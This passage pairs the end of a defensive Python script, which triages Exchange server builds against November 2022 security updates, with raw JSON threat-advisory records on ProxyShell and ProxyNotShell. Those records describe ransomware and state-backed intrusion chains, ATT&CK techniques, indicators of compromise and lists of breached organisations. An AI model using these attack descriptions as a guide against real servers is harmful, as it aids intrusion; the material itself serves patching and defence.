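    ("2019", 12, (15, 2, 1118), (15, 2, 1118, 20)),
]


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '15.1.2375.24' (or Tenable's 5-part '15.1.2375.32.1') into a tuple
    of ints.  Tuple comparison then orders builds numerically, which a plain
    string comparison would not ('15.1.2375.24' sorts after '15.1.2375.3')."""
    parts = text.strip().split(".")
    if len(parts) < 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not an Exchange build number: {text!r}")
    return tuple(int(p) for p in parts)


def assess(build: str) -> dict:
    """Classify one Exchange build against the Nov 2022 fixed builds.

    status is one of:
      patched          build >= the fixed build for its CU
      vulnerable       supported CU, build below the fixed build
      unsupported-cu   product known, but the CU is not in the table, so no
                       security update exists for it (upgrade the CU first)
      unknown-product  not Exchange 2013/2016/2019 at all
    """
    v = parse_version(build)
    product = PRODUCT_BY_MAJOR_MINOR.get(v[:2])
    if product is None:
        return {"build": build, "product": None, "cu": None, "status": "unknown-product"}
    for prod, cu, family, fixed in NOV_2022_FIXED:
        if prod == product and v[:3] == family:
            status = "patched" if v >= fixed else "vulnerable"
            return {"build": build, "product": product, "cu": cu, "status": status}
    return {"build": build, "product": product, "cu": None, "status": "unsupported-cu"}


def triage(builds: list[str]) -> list[str]:
    """One report line per host, worst findings first."""
    order = {"vulnerable": 0, "unsupported-cu": 1, "unknown-product": 2, "patched": 3}
    rows = sorted((assess(b) for b in builds), key=lambda r: order[r["status"]])
    return [
        f"{r['build']:<16} Exchange {r['product'] or '?':<5} CU{r['cu'] or '?':<3} {r['status']}"
        for r in rows
    ]


# Constructed sample inventory (not real hosts).
SAMPLE_BUILDS = [
    "15.1.2375.24",  # 2016 CU22, pre-November build
    "15.1.2507.16",  # 2016 CU23 with KB5019758
    "15.2.1118.15",  # 2019 CU12, still on the October build
    "15.0.1497.44",  # 2013 CU23 with KB5019076
    "15.1.2308.27",  # 2016 build family not in the table: unsupported CU
    "14.3.513.0",    # not Exchange 2013/2016/2019
]

if __name__ == "__main__":
    for line in triage(SAMPLE_BUILDS):
        print(line)
```

Feed it the file version of ExSetup.exe (or the build reported by Microsoft's HealthChecker script) rather than the AdminDisplayVersion from Get-ExchangeServer, which is not updated when a security update is installed and would make a patched server compare as vulnerable. Note also how the October plugin above expressed "no patch yet": its fixed_version values such as 15.0.1497.42.1 sit one step above the builds then shipping, so every supported installation was reported until the November plugin replaced them with real fixed builds.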
"published": "2022-10-03T09:00:00", "type": "akamaiblog", "title": "Akamai's Response to Zero-Day Vulnerabilities in Microsoft Exchange Server (CVE-2022-41040 and CVE-2022-41082)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T09:00:00", "id": "AKAMAIBLOG:0287B84AF09C377FDC8D475774722858", "href": "https://www.akamai.com/blog/security-research/akamais-response-zero-day-vulnerabilities-microsoft-exchange-server", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-10-03T06:08:35", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft Exchange Server has two unpatched zero-day vulnerabilities. One of them is a Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-41040), while the second is a remote code execution (RCE) vulnerability (CVE-2022-41082) in PowerShell. 
An authenticated attacker can chain these two vulnerabilities to gain access to a victim's system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:21:56", "type": "hivepro", "title": "Unpatched zero-day vulnerabilities of Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T10:21:56", "id": "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "href": "https://www.hivepro.com/unpatched-zero-day-vulnerabilities-of-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-18T13:20:19", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/MuddyWater-is-taking-advantage-of-old-vulnerabilities_TA202149.pdf>)\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom's National Cyber Security Centre (NCSC) have issued a joint advisory to warn organizations about a state-sponsored APT actor exploiting old Fortinet and ProxyShell vulnerabilities. 
\nSince late March 2021, this APT Iranian State sponsored Actor (MuddyWater) has been breaching vulnerable networks by exploiting Fortinet vulnerabilities. The Hive Pro threat Research team has issued a detailed and in [depth](<https://www.hivepro.com/old-fortinet-vulnerabilities-exploited-by-state-sponsored-actors/>) advisory for the same. \nNow, in October 2021, MuddyWater is getting initial access to the susceptible system by exploiting the well known ProxyShell Vulnerability (CVE 2021 34473). \nIt is recommended that organizations patch these vulnerabilities as soon as available. \nThe Tactics and Techniques used by MuddyWater are: \nTA0042 - Resource Development \nT1588.001 - Obtain Capabilities: Malware \nT1588.002 - Obtain Capabilities: Tool \nTA0001 - Initial Access \nT1190 - Exploit Public Facing Application \nTA0002 - Execution \nT1053.005 - Scheduled Task/Job: Scheduled Task \nTA0003 - Persistence \nT1136.001 - Create Account: Local Account \nT1136.002 - Create Account: Domain Account \nTA0004 - Privilege Escalation \nTA0006 - Credential Access \nTA0009 - Collection \nT1560.001 - Archive Collected Data: Archive via Utility \nTA0010 - Exfiltration \nTA0040 - Impact \nT1486 - Data Encrypted for Impact\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n\n\n#### Patch Link\n\n<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>\n\n<http://www.securityfocus.com/bid/108693>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-18T11:45:32", "type": "hivepro", "title": "MuddyWater is taking advantage of old vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-18T11:45:32", "id": "HIVEPRO:186D6EE394314F861D57F4243E31E975", "href": "https://www.hivepro.com/muddywater-is-taking-advantage-of-old-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. 
Organizations can mitigate the risk by following these recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: \nTA0001: Initial Access \nTA0002: Execution \nTA0003: Persistence \nTA0004: Privilege Escalation \nTA0005: Defense Evasion \nTA0006: Credential Access \nTA0007: Discovery \nTA0008: Lateral Movement \nTA0009: Collection \nTA0011: Command and Control \nTA0010: Exfiltration \nTA0040: Impact \nT1190: Exploit Public-Facing Application \nT1566: Phishing \nT1566.001: Spear-phishing Attachment \nT1106: Native API \nT1204: User Execution \nT1204.002: Malicious File \nT1059: Command and Scripting Interpreter \nT1059.001: PowerShell \nT1059.003: Windows Command Shell \nT1053: Scheduled Task/Job \nT1053.005: Scheduled Task \nT1047: Windows Management Instrumentation \nT1136: Create Account \nT1136.002: Domain Account \nT1078: Valid Accounts \nT1078.002: Domain Accounts \nT1547: Boot or Logon Autostart Execution \nT1068: Exploitation for Privilege Escalation \nT1140: Deobfuscate/Decode Files or Information \nT1070: Indicator Removal on Host \nT1070.001: Clear Windows Event Logs \nT1562: Impair Defenses \nT1562.001: Disable or Modify Tools \nT1003: OS Credential Dumping \nT1003.005: Cached Domain Credentials \nT1018: Remote System Discovery \nT1021: Remote Services \nT1021.001: Remote Desktop Protocol \nT1021.002: SMB/Windows Admin Shares \nT1021.006: Windows Remote Management \nT1083: File and Directory Discovery \nT1057: Process Discovery \nT1063: Security Software Discovery \nT1049: System Network Connections Discovery \nT1135: Network Share Discovery \nT1071: Application Layer Protocol \nT1071.001: Web Protocols \nT1570: Lateral Tool Transfer \nT1486: Data Encrypted for Impact \nT1005: Data from Local System \nT1560: Archive Collected Data \nT1560.001: Archive via Utility \nT1105: Ingress Tool Transfer \nT1567: Exfiltration Over Web Service\n\nActor Details\n\nVulnerability Details\n\nIndicators of Compromise (IoCs)\n\nRecent Breaches \nhttps://millsgrouponline.com/ \nhttps://www.fcch.com/ \nhttps://www.konradin.de/de/ \nhttps://www.pollmann.at/en \nhttps://www.emilfrey.ch/de \nhttps://rte.com.br/ \nhttps://www.friedrich.com/ \nhttps://powerhouse1.com/ \nhttps://www.hshi.co.kr/eng/ \nhttps://www.eurocoininteractive.nl/ \nhttps://www.itsinfocom.com/ \nhttps://www.pan-energy.com/ \nhttps://nsminc.com/ \nhttps://www.ucsiuniversity.edu.my/ \nhttps://kemlu.go.id/portal/id\n\nPatch Links \nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 \nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 \nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207\n\nReferences \nhttps://www.varonis.com/blog/hive-ransomware-analysis \nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35, aka Magic Hound, an Iranian-backed threat group, has begun using the Microsoft Exchange ProxyShell vulnerabilities as an initial access vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access, create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the \"remote desktop users\" and \"local administrator's users\" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. They then create a process memory dump of LSASS.exe, which is zipped before exfiltration via the web shell. The threat actor uses native Windows programs such as \"net\" and \"ipconfig\" to enumerate the compromised server. A file masquerading as dllhost.exe is used to reach certain domains for command and control. Data exfiltrated by the threat actor could potentially result in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. 
Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: \nTA0001: Initial Access \nTA0002: Execution \nTA0003: Persistence \nTA0004: Privilege Escalation \nTA0005: Defense Evasion \nTA0006: Credential Access \nTA0007: Discovery \nTA0011: Command and Control \nT1190: Exploit Public-Facing Application \nT1003: OS Credential Dumping \nT1098: Account Manipulation \nT1078: Valid Accounts \nT1105: Ingress Tool Transfer \nT1036: Masquerading \nT1036.005: Masquerading: Match Legitimate Name or Location \nT1543: Create or Modify System Process \nT1543.003: Create or Modify System Process: Windows Service \nT1505: Server Software Component \nT1505.003: Server Software Component: Web Shell \nT1082: System Information Discovery \nT1016: System Network Configuration Discovery \nT1033: System Owner/User Discovery \nT1059: Command and Scripting Interpreter \nT1059.003: Command and Scripting Interpreter: Windows Command Shell\n\nActor Details\n\nVulnerability Details\n\nIndicators of Compromise (IoCs)\n\nPatches \nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 \nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 \nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523\n\nReferences \nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. 
Attackers then use this web shell to deploy a Cobalt Strike beacon into the Windows Update Agent and obtain the credentials of a service account on the compromised servers. The actor then installs AnyDesk to gain control of the system and perform lateral movement in the organization's network. After exploitation, attackers continue using Cobalt Strike to execute the BlackByte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their servers for the ProxyShell vulnerabilities using the links below.\n\n**Techniques used by BlackByte ransomware are:**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files or Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n#### Vulnerability Details\n\n#### Actor Detail\n\n#### Indicators of Compromise (IoCs)\n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### 
References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file 
here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a 
\na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": 
"https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process 
Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 